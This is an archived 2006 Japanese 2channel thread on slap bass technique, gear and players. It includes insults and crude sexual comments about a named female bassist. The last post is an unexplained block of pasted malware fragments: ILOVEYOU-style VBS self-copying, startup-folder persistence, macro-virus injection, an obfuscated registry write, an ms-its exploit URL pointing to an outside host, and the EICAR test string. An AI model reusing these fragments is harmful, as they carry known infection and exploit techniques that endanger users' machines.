2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

スラップ(チョッパー)ベース総合スレッド 第19回

1 :ドレミファ名無シド:2006/07/18(火) 12:06:23 ID:VYKscO7s
このスレッドはスラップ(チョッパー)ベースについて雑談したり、
アップされたオリジナル音源についての感想を述べたりするスレッドです。
音源、機材、楽器のセッティング、音作り、テクニック、質問などでマターリ話しましょう。

前スレ
http://music4.2ch.net/test/read.cgi/compose/1146150182/l50


2 :ドレミファ名無シド:2006/07/18(火) 12:08:38 ID:VYKscO7s
【過去スレ】
第一回 ttp://music2.2ch.net/test/read.cgi/compose/1042800894/
第二回 ttp://music2.2ch.net/test/read.cgi/compose/1044429468/
第三回 ttp://music2.2ch.net/test/read.cgi/compose/1046250969/
第四回 ttp://music2.2ch.net/test/read.cgi/compose/1051534925/
第5回 ttp://music2.2ch.net/test/read.cgi/compose/1058889213/
第6回 ttp://music2.2ch.net/test/read.cgi/compose/1066887863/
第7回 ttp://music3.2ch.net/test/read.cgi/compose/1075473299/
第7回 ttp://music4.2ch.net/test/read.cgi/compose/1078208279/
第8回 ttp://music4.2ch.net/test/read.cgi/compose/1091628481/
第10回ttp://music4.2ch.net/test/read.cgi/compose/1097538595/
第11回ttp://music4.2ch.net/test/read.cgi/compose/1102430306/
第12回ttp://music4.2ch.net/test/read.cgi/compose/1107766455/
第13回ttp://music4.2ch.net/test/read.cgi/compose/1114327077/
第14回ttp://music4.2ch.net/test/read.cgi/compose/1119798546/
第15回ttp://music4.2ch.net/test/read.cgi/compose/1122736007/
弟16回ttp://music4.2ch.net/test/read.cgi/compose/1127460326/
第17回ttp://music4.2ch.net/test/read.cgi/compose/1138543082/
第18回ttp://music4.2ch.net/test/read.cgi/compose/1146150182/


3 :ドレミファ名無シド:2006/07/18(火) 12:31:32 ID:PQIxqU7u
仮面ライダーV3

4 :ドレミファ名無シド:2006/07/18(火) 14:28:28 ID:QjUhoaJ0
しょうもない質問ですけど、スラップにはジャズベやスティングレイがいいって聞きますけど、
プレベとどういったところが違うんですか?
やっぱりピックアップとかの問題ですか?

5 :ドレミファ名無シド:2006/07/18(火) 16:19:53 ID:htlz5601
プレベでもおk
音やプレイした感覚が違うけど、楽器屋行って鳴らしてみるのが一番早い。
好きなの使えばおk

6 :ドレミファ名無シド:2006/07/18(火) 16:51:29 ID:WrW8kiK3
プレベでスラップした時の「ドゥム プペッ」って音が意外と好き。

7 :ドレミファ名無シド:2006/07/18(火) 16:51:48 ID:QjUhoaJ0
>>5
親切にありがとうございました!

8 :ドレミファ名無シド:2006/07/18(火) 22:58:54 ID:N8aWcq5Z
スティングレイ、モジュラス以外
ドドペッ

スティングレイ、モジュラス
ギョンギョンビョン

9 :ドレミファ名無シド:2006/07/18(火) 23:38:56 ID:N8aWcq5Z
powブーム去ったので魂の解放しようや

10 :ドレミファ名無シド:2006/07/19(水) 01:09:00 ID:KaAIg2r8
ZOOMスレから転記
ミョーな雰囲気

>717 名前:ドレミファ名無シド 投稿日:2006/07/18(火) 01:05:50
>拾い物だけど、漏れ結構こういうの好き↓
>http://www.yonosuke.net/u/6c/6c-5103.mp3


11 :ドレミファ名無シド:2006/07/19(水) 01:16:14 ID:0IVLc6GZ
何?この糞みたいな音源。

12 :ドレミファ名無シド:2006/07/19(水) 01:30:30 ID:KaAIg2r8
>>11
作れそうで作れないんでないか?

13 :ドレミファ名無シド:2006/07/19(水) 01:37:52 ID:dwi9Hn77
おけ作りました
適当にどうぞ
http://www.yonosuke.net/u/6c/6c-5149.mp3

14 :ドレミファ名無シド:2006/07/19(水) 01:54:02 ID:0IVLc6GZ
>>12
いや、無茶苦茶すぎて作ろうとか考えるレベルじゃないというか。

15 :ドレミファ名無シド:2006/07/19(水) 02:03:04 ID:+U7M+Jew
1乙 久々に来たけど息長いね、変態さんはまだ居る?

16 :ドレミファ名無シド:2006/07/19(水) 02:54:46 ID:KaAIg2r8
>>14
やっぱり本当に無茶苦茶なのかな。
ディレイの掛け方なんか一発じゃこんな感じには絶対ならないし
何かアナログ的な操作しているように思えるんだけど。
意識的に無茶苦茶にしてるってのは、考えすぎかなぁ?


17 :ドレミファ名無シド:2006/07/19(水) 08:11:21 ID:gD/hYhHp
>>13
powオケの人?

18 :ドレミファ名無シド:2006/07/19(水) 19:38:10 ID:dwi9Hn77
ちゃうよ

19 :ドレミファ名無シド:2006/07/19(水) 19:39:23 ID:dwi9Hn77
よっぱらって作ったんだけど
今聴くと、ベースの邪魔にしかならないオケ作ってしまったね。

20 :ドレミファ名無シド:2006/07/20(木) 01:38:56 ID:ykdBaTvd
>>16
結構イイと思うけどね。
ギターなんかヘタそうに弾いてるけどホントはうまそうだし。


21 :ドレミファ名無シド:2006/07/20(木) 02:29:53 ID:LYAxFbGH
>>19
邪魔にしかならんってことはないよ

22 :13:2006/07/20(木) 05:58:54 ID:Qa3YTUtp
そもそも ベーシストじゃないんだけど スラップが好きで
ここはよく来るんだけど 
よかったらこれにスラップ入れてみてくれって感じだったのです。

23 :ドレミファ名無シド:2006/07/20(木) 22:21:55 ID:++hNv+Sr
>>13
MIDIギター?いずれにしても生で弾いてますよね。好感でつ

24 :ドレミファ名無シド:2006/07/21(金) 00:13:08 ID:0s7pq1s9
最近スラップ始めたんですが、左手のゴーストが上手く出せず
どうしても実音が鳴ってしまいます。
自分は今、
左手人差し指でセーハする様に弦をミュートして残りの指で叩いたり
右手の手首の辺りを、弦にあててミュートしながらやっているんですが
実音が鳴ってしまうか濁ったきたない音になってしまいます。
やり方自体が間違っているんでしょうか?




25 :ドレミファ名無シド:2006/07/21(金) 23:40:09 ID:d52zcv9n
力入れすぎなんじゃないの?

26 :ドレミファ名無シド:2006/07/21(金) 23:49:12 ID:poNYwExb
左手のミュートサウンド(ゴースト)は出そうと思わない方がいいです。
あくまで直前の音をきれいに消すんだと思ってください。
たたいてバチと言わせるんじゃなくて消すんです。
消すんです。
あくまで消すんです。

この意識で練習していて細かいフレーズが弾けるようになったときには
きれいにぱたぱたと音を立ててくれるようになります。

このゴーストを音を出すという意識でやると弾いてる本人はきもちよいですが回りのメンバーには迷惑なだけです。

パソコン前のみのプレイヤーには関係ないですが。

27 :ドレミファ名無シド:2006/07/22(土) 01:48:51 ID:qThfhHIt
>>26
直前の音⇒直後の音
のまちがい????

28 :ドレミファ名無シド:2006/07/22(土) 02:20:50 ID:XYITsrCT
別に間違ってないのでは。
前に出した音を綺麗にミュートする気持ちでやれってことかと。

29 :24:2006/07/22(土) 02:42:47 ID:8nbOzddI
>>25
>>26
レスありがとうございました。
ご指摘の通り、力任せに叩いていました・・・
綺麗に音を出せるように練習して行きたいと思います。
ありがとうございました




30 :ドレミファ名無シド:2006/07/22(土) 08:28:14 ID:wUJZM5VG
>>26のレスになんとなく感動した。

31 :ドレミファ名無シド:2006/07/22(土) 14:58:49 ID:ZPh77vyJ
ここの右上の「ベースPhoto」の3番目の人ってマーカス?
www.fine-photo.net

32 :ドレミファ名無シド:2006/07/22(土) 20:56:41 ID:8s9Ca5ji
>>27
どうやったら直後に出す音を直前にミュートできるのか?
日本語をちゃんと読め

33 :ドレミファ名無シド:2006/07/22(土) 23:39:41 ID:Xufy/fPP
>>32
おまえこそ日本語わかってるのか?
単に、出した音をすかさずミュートと言う事だろ。
だったら音を出してその直後、今出てる音をミュートするんだろうが。
直前の音だったら、目的とするミュートサウンドより前の音と思うだろうが、このボケが。
ちゃんと学校に行ったのか?どうせ、シンナーで軽石脳みそになってんだろ。


34 :ドレミファ名無シド:2006/07/23(日) 00:34:39 ID:zXRa8YZ5
????

35 :ドレミファ名無シド:2006/07/23(日) 01:10:49 ID:P8H7Nd5r

えーと、まだ二十歳の女の子だけどスラップ相当上手いと思います。

http://www.youtube.com/watch?v=pj7UCKH2wzA&mode=related&search=pink%20panda


36 :ドレミファ名無シド:2006/07/23(日) 01:28:30 ID:AYR7X0eR
>>33
正直、池沼ですか?
ミュートする直後の音をミュート出来るんですか?
すごいですねwww

音を出した直後にミュート=直前の音をミュート
直後の音をミュートじゃおかしすぎるだろうがwww

37 :ドレミファ名無シド:2006/07/23(日) 01:32:10 ID:lXE8uPzk
>>33は池沼

>>35
ガキは氏ねよ

38 :ドレミファ名無シド:2006/07/23(日) 01:38:56 ID:yDvNvuHt
>>35
でもバストは90なんだよなぁ〜

39 :ドレミファ名無シド:2006/07/23(日) 01:44:18 ID:FVOTDGZF
弾いた音をきれいに終わらせようとする動きがゴーストノートに聞こえると言うことを言いたかっただけなのだが。
ミュートサウンドを出すためにミュートサウンドを出すとおそらく33様のような勘違いが生まれるものと思います。
1拍目に4分音符を弾いて2拍目頭で左手を使ってしっかり消す
これを繰り返してどんどん早くすれば
TMTMTMの繰り返しになる
これがいわゆるミュートサウンドに聞こえるようになるんだと思うんだが。

2拍目は1拍目の終わりであって2拍目の始まりだと思うとアフタービートが弱くなるし1.2拍の関連性が希薄になる。

音をちゃんと終わらせられる人はよれがあってもカッコイイ
音を出すことばかり意識する人はどんなに正確に弾いてもかっこうわるい

40 :ドレミファ名無シド:2006/07/23(日) 02:41:20 ID:y4lQf7CX
>>38
地味目な顔がかーいい。
でも90はないだろう。

41 :ドレミファ名無シド:2006/07/23(日) 03:39:14 ID:P8H7Nd5r

>>40

マジで元グラビアアイドル

名前でぐぐると水着の写真が出てくるよ。

http://www.briskcrew.com/talent/koga/index.html

42 :ドレミファ名無シド:2006/07/23(日) 04:02:09 ID:P8H7Nd5r

>>37

 ガキ扱いしてるお前だが現実にはお前より若い女の子がプロデビューして
ちゃんとスラップで飯を食い、社会人してる。

 月4〜5回ライブやってんだぞ。たぶんお前よりこのネーちゃんのほうがスラップベース上手いよ。
いつまでもナルッチョとかスタンリークラークとかじゃねーだろ!

43 :ドレミファ名無シド:2006/07/23(日) 04:23:38 ID:lXE8uPzk
>>42
ハイハイ良かったね


つーか
お 前 が ガキだっつってんだがな

44 :ドレミファ名無シド:2006/07/23(日) 04:36:14 ID:P8H7Nd5r

>>43

お前が「氏ね」なんて汚い言葉使うから正論を述べただけじゃないか。

楽器弾く前に人格を身に付けた方がいいぞ。

45 :ドレミファ名無シド:2006/07/23(日) 04:41:52 ID:q/KaI3cj
>>44の勝ち

46 :ドレミファ名無シド:2006/07/23(日) 04:53:40 ID:lXE8uPzk
>>44
正論てw
どこがだよwww

「相当上手い」って耳腐ってんちゃうか
「スラップで飯食ってる」ってアホか
「マジで元グラビアアイドル」とかどーでもええし
ナルチョやスタクラと一緒にすんなよカス

だから
お 前 が ガキだっつってんだがな
何度も言わせんなカス

47 :ドレミファ名無シド:2006/07/23(日) 05:00:30 ID:P8H7Nd5r

>>46

だから言ってんだろう。

音楽業界って土俵の上ではスタクラもナルチョもあのネーちゃんも一緒だよ。

みんな同じプロフェッショナルなんだよ。

お前こそ大人になれよ。

それから、もう俺の勝ちは第三者の判定済み。

見苦しいよ。

48 :ドレミファ名無シド:2006/07/23(日) 05:01:23 ID:sNGKaOpk
    _
  ( ゚∀゚)
  (  ∩ミ  ブンブン
   | ωつ,゙
   し⌒J



49 :ドレミファ名無シド:2006/07/23(日) 05:48:55 ID:zXRa8YZ5
夏ですね。

50 :ドレミファ名無シド:2006/07/23(日) 06:46:17 ID:yDvNvuHt
要するに、
>>37>>35の女の子と同じことをやっても多分誰からも相手はしてもらえない。
ガキだのどうだの言っても意味がないって事。



>>37が可愛い娘だったら話は別だがな。

51 :ドレミファ名無シド:2006/07/23(日) 11:58:08 ID:kba4Nqx8

>それから、もう俺の勝ちは第三者の判定済み。

>見苦しいよ。


おれ中1でまだガキだけど、俺よりこの人はガキだと思った夏。

52 :ドレミファ名無シド:2006/07/23(日) 12:05:34 ID:P8H7Nd5r

>>51

一晩考えて昼前に出したネタがそれかよ。

泣けてきた。

いいからもうずーとベース弾いてていいよ。俺が許す。

53 :ドレミファ名無シド:2006/07/23(日) 12:07:20 ID:zxMXo5uS
>>46>>47、特に>>51、お前らまとめてガキだ

>>51は終わりかけてる話を蒸し返すんじゃねーよ、空気嫁

って反応するオレが最悪の夏厨決定wwwww



↓↓↓以下、何事も無かったかのようにB90のチョッパー娘の話題↓↓↓

54 :ドレミファ名無シド:2006/07/23(日) 12:07:38 ID:CnLhSxej
>音楽業界って土俵の上ではスタクラもナルチョもあのネーちゃんも一緒だよ。
>みんな同じプロフェッショナルなんだよ。

当たり前過ぎることだな。実社会でも同じだろw
実社会でコミュニケーションも取らずベースといっても卓上の論でしか議論できず。
(ベース始めたてはみんな勘違いするもんだが)

47よ、俺の顔に免じて許してあげて欲しい。



55 :ドレミファ名無シド:2006/07/23(日) 12:08:35 ID:zxMXo5uS
ageちゃったね、ごめんねみんな・・・・_| ̄|○

56 :ドレミファ名無シド:2006/07/23(日) 12:11:09 ID:CnLhSxej
↓↓↓以下、何事も無かったかのように俺の水虫が再発してる件について↓↓↓

57 :ドレミファ名無シド:2006/07/23(日) 12:23:04 ID:P8H7Nd5r

あのオッパイベースちゃんだって10年後には日本のンデゲンチェロとか
マーカスミラーとか呼ばれてるかもしれないじゃないか。

その前に俺と結婚してほしいが・・・

水虫はピロエースが凄く効くよ。

58 :ドレミファ名無シド:2006/07/23(日) 12:23:55 ID:qHZLy+72
俺は半年通院して完治したよ。
再発の気配もナス

59 :ドレミファ名無シド:2006/07/23(日) 12:50:22 ID:CnLhSxej
>57
でも10年後っていったら40オーバーだぜ
志村の付け乳みたくなってたらやだなw

水虫は明日医者に行ってくるよ。

それにしても湿気が多いからネックが動きすぎて困るな
音も湿った音になる、乾燥剤入れたケースから頻繁に出し入れして急激に
環境変化をさせるより剥き出しのまま置いといてなだらかに適応させたほうがいいのか?
保管方法ってあんまり議論されないけど板違いかw

↓↓↓以下、何事も無かったかのようにB90の美智子の話題↓↓↓





60 :ドレミファ名無シド:2006/07/23(日) 13:00:56 ID:P8H7Nd5r

>>59

あのオッパイチョッパー娘、今二十歳だよ。

使用してるベースは

ミュージックマン・スティングレイの5弦

アトリエ Z の特注(水玉模様)

ステージではチョッパー・スラッピングのソロ有り

客層はほとんど業界関係者かオタ、あのルックスと曲じゃあしかたねーか・・・

一応元グラビアイドルは隠してない。事務所がアイドル系だからしかたねーか・・・

あのバンドのリーダーで去年まで他にもう一個椎名林檎みたいなバンドやってたから
根っからのアーチスト気質だと思う。(アマチュアになっても音楽続けそうなタイプ)

水虫はひどかったら病院いくのが早いかも

61 :ドレミファ名無シド:2006/07/23(日) 13:15:30 ID:CnLhSxej
おっぱいべーちゅに見えた・・・・_| ̄|○

62 :ドレミファ名無シド:2006/07/23(日) 13:19:48 ID:P8H7Nd5r

一応 hpです。

http://www.pinpan.jp/

俺は訳あって去年あたりから注目してたんだけど女の子バンドにしては
アンサンブルが良かったりメンバーの個性的なプロフィール(例えばドラムは早稲田大学
の現役女子大生)に興味があったりしてたんだけど、みんなも興味があったら応援してみてくれ。

もういつでもスレタイの話題に戻していいよ。

63 :ドレミファ名無シド:2006/07/23(日) 14:12:16 ID:sC432ykH
確かに、ネック暴れてルナ〜

梅雨、明けないかね...

64 :ドレミファ名無シド:2006/07/23(日) 14:44:46 ID:zxMXo5uS
>>60
Bacchusじゃなかった?
何ヶ月か前のベースマガジンに載ってた気がする

65 :ドレミファ名無シド:2006/07/23(日) 18:34:26 ID:KuycmcOt
このおっぱいベースzoneのベースに似てる気がする

66 :ドレミファ名無シド:2006/07/23(日) 19:01:17 ID:kvR4fs72
初めてマルチポストの見苦しさを感じることができました。

67 :ドレミファ名無シド:2006/07/23(日) 19:06:49 ID:L4X3NiWJ
この子の乳首を想像してたら俺のLow-P弦のテンションが上がったのはなぜ?

68 :ドレミファ名無シド:2006/07/23(日) 21:57:44 ID:uCW6bhgI
この子のおっぱいを想像してたら俺のヘッドがおっきしますた。

69 :ドレミファ名無シド:2006/07/23(日) 22:14:23 ID:yDvNvuHt
>>61
べーちゅのベースにのっかったおっぱいを想像してたら(ry

70 :ドレミファ名無シド:2006/07/23(日) 23:08:01 ID:KuycmcOt
>>69
抜いてくる!

71 :ドレミファ名無シド:2006/07/24(月) 01:05:57 ID:wKpfUq96
古賀タンのベースのストラップになりたひ

72 :ドレミファ名無シド:2006/07/24(月) 01:10:54 ID:EQSirES5
ところでおまいら流れをぶった切って悪いが、スイサイダルのスクリームアウト弾ける?

73 :ドレミファ名無シド:2006/07/24(月) 02:03:13 ID:93ar2e1d
古賀ちゃんのソロ動画ないかな?

74 :ドレミファ名無シド:2006/07/24(月) 02:10:33 ID:Nu/LWenS
マーカス以外で旬なのって誰?

75 :ドレミファ名無シド:2006/07/24(月) 02:17:07 ID:J1i0vBdS
やっぱりウッテン、ボナあたりじゃまいか?

76 :ドレミファ名無シド:2006/07/24(月) 02:23:09 ID:SlMBdrI7
やっぱりレス・クレイプール辺りジャマイカ?

77 :ドレミファ名無シド:2006/07/24(月) 02:43:04 ID:c+yLCnAJ
レスって活動してるの?

78 :ドレミファ名無シド:2006/07/24(月) 02:55:54 ID:7Zd6ehXq
旬じゃないと分かっていても、ずっとネイザン・イーストの音を夢見てます。

79 :ドレミファ名無シド:2006/07/24(月) 04:19:29 ID:U9Mttv+e
そんなあなたにヤマーハー

80 :ドレミファ名無シド:2006/07/24(月) 04:37:26 ID:AL8yiA+P

この流れで言えば旬はンデゲンチェロ

俺の旬は永遠にジャコ。ジャコ越えるやつ早くでてこーい!

あっそうかここはスラップ板だった。

それじゃあ今の俺の旬のスラッパーは2ちゃんではすでに有名なこの人

http://www.youtube.com/watch?v=bXImi2etl7I&search=nathhan

この人ちょっとジャコテイストあるんだよね。

後、当然古賀ちゃんですねん。

81 :ドレミファ名無シド:2006/07/24(月) 08:50:24 ID:Unbjv+To
>>77
こないだソロアルバム出たよ
プライマスのニューアルバムも控えてるとか

82 :ドレミファ名無シド:2006/07/24(月) 09:04:09 ID:/qeufPWC
香ばしい奴が巣食ってる件について

83 :ドレミファ名無シド:2006/07/24(月) 10:54:43 ID:jChnljRI
昔 オタ臭ぷんぷんの香ばしい奴が巣食ってた

今 バカ臭ぷんぷんの香ばしい奴が巣食ってる



結論 今も昔も香ばしい奴が巣食い続けてる

84 :ドレミファ名無シド:2006/07/24(月) 16:44:16 ID:AL8yiA+P

>>82>>83

早く大人になれ。


85 :ドレミファ名無シド:2006/07/24(月) 16:59:11 ID:c+yLCnAJ
>>81
プライマス新しいの出るのか
これは楽しみ

86 :ドレミファ名無シド:2006/07/24(月) 17:57:07 ID:vFjFaIdE
>>84
スルーできないお前も香ばしい。
そして>>82>>83をスルーしたものの、お前をスルーできない俺も香(ry

87 :ドレミファ名無シド:2006/07/24(月) 23:57:01 ID:Nu/LWenS
>>80
無理してベースでやる意味あるの?って思うが、、、


88 :ドレミファ名無シド:2006/07/25(火) 00:22:28 ID:OBlJv5A7
>>87
意味不明。ベースでしか出来ないプレイ(出せない音色)じゃないか。

89 :ドレミファ名無シド:2006/07/25(火) 00:38:06 ID:aXZyWJlO
>>87
同意。

しかし何だいジャコテイストって?!何て曲を聞いてそうオモタんだい?

90 :ドレミファ名無シド:2006/07/25(火) 00:43:24 ID:mm5iT8Cu
リアルでイタイ奴だったんだな・・・
合掌

91 :ドレミファ名無シド:2006/07/25(火) 00:52:46 ID:LREVVveQ
みんな気づいてないかもしれんがもう夏休みだ
そう考えると>>80見たいなのも受け入れられるよ

92 :ドレミファ名無シド:2006/07/25(火) 01:35:48 ID:g0Azj4Jd
ジャコってあの小魚のことですか?

93 :ドレミファ名無シド:2006/07/25(火) 01:36:21 ID:HY//6sjg

プライマス 声がキモイ。曲つまらない。

このスレ ラリーグラハムも知らないでスラップ語ってるイタイ奴等ばっかり

94 :ドレミファ名無シド:2006/07/25(火) 01:37:51 ID:RTOYCbMn
古賀ちゃん以外に誰が旬だと。

95 :ドレミファ名無シド:2006/07/25(火) 01:40:08 ID:LUyIKRBL
>>93
これだから夏に沸くド素人はw

96 :ドレミファ名無シド:2006/07/25(火) 01:43:49 ID:HY//6sjg

>>95

お前以上の素人見た事が無い。

97 :ドレミファ名無シド:2006/07/25(火) 01:47:32 ID:qo07gGAC
>>88
そうかなぁ?
結局、和音が制限されて3度が妙に欠落した
モノトーン的サウンドばっかりになっちゃって、
この曲は良いにしてもバリエーション少なすぎるだろうしね。
ま、低音専門の香具師にはそれが良いのか?




98 :ドレミファ名無シド:2006/07/25(火) 03:25:10 ID:1pKC33Vl
>>97

弾き語りのスタイルだから3度は気にしなくていいと思うが。

無理しているわけじゃないと思う。それが彼のスタイルなんだろう。

アコギとかバリトンギターで弾いてもあの音色になんないから
やっぱりベースで弾く意味はあると思うし。

99 :ドレミファ名無シド:2006/07/25(火) 03:32:08 ID:7/XRulID
色々言いたい事はあるが、この曲は良いという自分なりの結論を出した後に

はたしてそれが良いのかと妥協のニュアンスを含んだ投げかけをしている。

これは自分を低音専門の香具師とおいた上での自問自答とみなしてよいでしょうか

と、皆さんに問いたい。




100 :ドレミファ名無シド:2006/07/25(火) 03:33:31 ID:7/XRulID
いや、むしろ問われたい。


101 :ドレミファ名無シド:2006/07/25(火) 03:39:36 ID:LREVVveQ
>>93
ハア?
おまえは前スレ流れ見てないのか

102 :ドレミファ名無シド:2006/07/25(火) 03:48:23 ID:1pKC33Vl
>>100

くまんばちの飛行をコントラバスで弾くことに意味はあるのか?

意味なんかあるわけねーじゃん。

ただ、面白い。面白ければ別にいいじゃん。

好みは人それぞれだけどケチをつけるより先に拍手を送る人間でありたいね。
だって俺にはできねーもん。

103 :ドレミファ名無シド:2006/07/25(火) 04:05:17 ID:HY//6sjg

下手に自分の意見をいうと「イタイ奴」と「香ばしい」とか言われるから

もう何も言いたくない。

人の揚げ足取る奴ばっかりだな。このスレは。

104 :ドレミファ名無シド:2006/07/25(火) 04:32:28 ID:lhb7R39K
プライマスは確かにつまらない

105 :ドレミファ名無シド:2006/07/25(火) 05:24:17 ID:l7tJNkYI
>>103
ラリーグラハム知らないのはありえないだろ
F1大好きでセナを知らないくらいありえないだろ

106 :ドレミファ名無シド:2006/07/25(火) 07:59:17 ID:ybyxydcD
うPまだ〜?

107 :ドレミファ名無シド:2006/07/25(火) 09:27:03 ID:o9OfJvvv
プライマスよりレスのソロ&他プロジェクトのほうが好き

108 :ドレミファ名無シド:2006/07/25(火) 11:56:31 ID:zkYhl/eq
夏休みが終わってからうpしようかな

109 :ドレミファ名無シド:2006/07/25(火) 14:51:26 ID:F2h5Izne
おれもおじさんになっちゃったんだな

110 :ドレミファ名無シド:2006/07/25(火) 15:38:11 ID:o7qaOVVi
>>103は何故か定期的に「グラハム知らない奴ばかりだな!」とか騒ぎ出し、
その度に「んなわけあるかハゲ!」と叩かれ毎回半ベソ。
どこか心を病んでいるのだろう。

111 :ドレミファ名無シド:2006/07/25(火) 19:47:48 ID:Oa6efvNS
グラハムは好きだけど「グラハムも知らない」みたいな事を言う奴は嫌いだな。


112 :ドレミファ名無シド:2006/07/25(火) 20:48:11 ID:aXZyWJlO
>>105
F-1やり始めたのがセナなのかよ?
ちなみにおいらはバトンファン

113 :ドレミファ名無シド:2006/07/25(火) 20:55:47 ID:CeX4Sbo+
>>112
有名かどうかのたとえ話ですよ。
グラハム=セナというわけじゃない

114 :ドレミファ名無シド:2006/07/25(火) 21:12:28 ID:8O6xk4W3
♪アル日突然知ラナイ男ガ 私ヲ呼ビトメテ♪
♪イイカロックンロールヲ知ラナキャ モグリト呼バレルゼ♪
♪オレハ10回ストーンズ見ニ行ッタゼ♪

115 :ドレミファ名無シド:2006/07/25(火) 23:21:02 ID:rSjv0Nn6
くさいものには蓋をしろ

116 :ドレミファ名無シド:2006/07/26(水) 10:43:12 ID:i+HWWT18
>>114
ノリあってねー
毒男乙。

チョッパーなら、マキシマムザホルモンの上ちゃんが1番だねb
あと、オレンジレンジのmuciQツアーのズンズンファンキーミュージックの自己紹介のYOHのベースソロもなかなか…。


117 :ドレミファ名無シド:2006/07/26(水) 10:55:56 ID:2BhuSgsr
まあ、レスの良さがわからない奴なんて打ち込みのJ-Popでも聴いてなさいってこった。

118 :ドレミファ名無シド:2006/07/26(水) 12:58:52 ID:1p2GnwQw
夏休みですね

119 :ドレミファ名無シド:2006/07/26(水) 16:43:03 ID:j97bcEKI
>>116
 こ れ は ひ ど い 

120 :ドレミファ名無シド:2006/07/26(水) 17:35:35 ID:0OQUQEgJ
メンバー紹介時のスラップほど、恥ずかしいものは無いと思ふ。(´・ω・`)

121 :ドレミファ名無シド:2006/07/26(水) 17:48:12 ID:LLsWMUCK
しかも他の曲が2フィンガーで8分弾きばっかとかだと余計に恥ずかしい

122 :ドレミファ名無シド:2006/07/26(水) 17:51:17 ID:YgiNdLhV
つかまずオレンジレンジってのが…

いや、ごんめ

123 :ドレミファ名無シド:2006/07/26(水) 18:46:15 ID:KJ6dqE8f
なんのことやらw

他の曲は別に悪いと思わなかったがこの間のNHKサッカー放送とタイアップの
曲はひどいと思った

124 :ドレミファ名無シド:2006/07/26(水) 18:59:55 ID:csUweC/8
>>120-121
> メンバー紹介時だけツーフィンガーで8分弾きというのはどうですか?


125 :ドレミファ名無シド:2006/07/26(水) 19:09:09 ID:JZJZmTqv
そうか夏休みなのだな

126 :ドレミファ名無シド:2006/07/26(水) 19:16:58 ID:giOJ45wk
神様仏様稲尾様が、ラジオの出演したときに話していた星野さんとの思い出話
稲尾様が中日のピッチングコーチだったとき、当時のエースは星野さん
とある試合で星野さんが先発したが、1点リードのまま迎えた試合の終盤
明らかにバテ気味の星野さん、当然ピンチを向かえる
様子を伺おうとベンチを出る稲尾様
それを見た星野さんは、不機嫌そうにマウンドの土を蹴る
いかにも「何しに来たんだこの野郎」的なニュアンスで稲生様を睨み付ける
燃える男星野
しかしマウンド上で交わされた会話は意外なものだった
稲尾様「どうだ?まだ行けるか?」
星野さん「どうだ?じゃないでしょうー見ればわかるでしょー」
稲尾様「はぁ?」
星野さん「だから無理だってー早く代えてよー」
当然、稲尾様と監督は投手交代を指示
するとベンチに引き下がる星野さんは、去り際にグローブを叩き付け「まだ行けた」をアピール
観客からは監督や稲尾様に対するブーイングの嵐
結局、代わった投手が打たれ、この日は逆転負け
翌日の新聞には、星野さんを代えたことに対する批判記事が連なる
翌日、頭に来た稲尾様は星野さんに、「お前のあのときの態度は何だ。お前が代えてくれと言ったから代えたんじゃないか。」
と問いただすと、
星野さん「俺の立場も分かってくださいよー中日の星野ですよー?観客に弱いところは見せられないでしょーwww」
とのご返事
稲尾様は呆れてそれ以上話す気にならなかったそうです
いいお話ですね

127 :ドレミファ名無シド:2006/07/26(水) 19:52:29 ID:OjCnrc96
126 :ドレミファ名無シド:2006/07/26(水) 19:16:58 ID:giOJ45wk
神様仏様稲尾様が、ラジオの出演したときに話していた星野さんとの思い出話
稲尾様が中日のピッチングコーチだったとき、当時のエースは星野さん
とある試合で星野さんが先発したが、1点リードのまま迎えた試合の終盤
明らかにバテ気味の星野さん、当然ピンチを向かえる
様子を伺おうとベンチを出る稲尾様
それを見た星野さんは、不機嫌そうにマウンドの土を蹴る
いかにも「何しに来たんだこの野郎」的なニュアンスで稲生様を睨み付ける
燃える男星野
しかしマウンド上で交わされた会話は意外なものだった
稲尾様「どうだ?まだ行けるか?」
星野さん「どうだ?じゃないでしょうー見ればわかるでしょー」
稲尾様「はぁ?」
星野さん「だから無理だってー早く代えてよー」
当然、稲尾様と監督は投手交代を指示
するとベンチに引き下がる星野さんは、去り際にグローブを叩き付け「まだ行けた」をアピール
観客からは監督や稲尾様に対するブーイングの嵐
結局、代わった投手が打たれ、この日は逆転負け
翌日の新聞には、星野さんを代えたことに対する批判記事が連なる
翌日、頭に来た稲尾様は星野さんに、「お前のあのときの態度は何だ。お前が代えてくれと言ったから代えたんじゃないか。」
と問いただすと、
星野さん「俺の立場も分かってくださいよー中日の星野ですよー?観客に弱いところは見せられないでしょーwww」
とのご返事
稲尾様は呆れてそれ以上話す気にならなかったそうです
いいお話ですね


128 :ドレミファ名無シド:2006/07/27(木) 00:09:10 ID:UgurgpWV
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


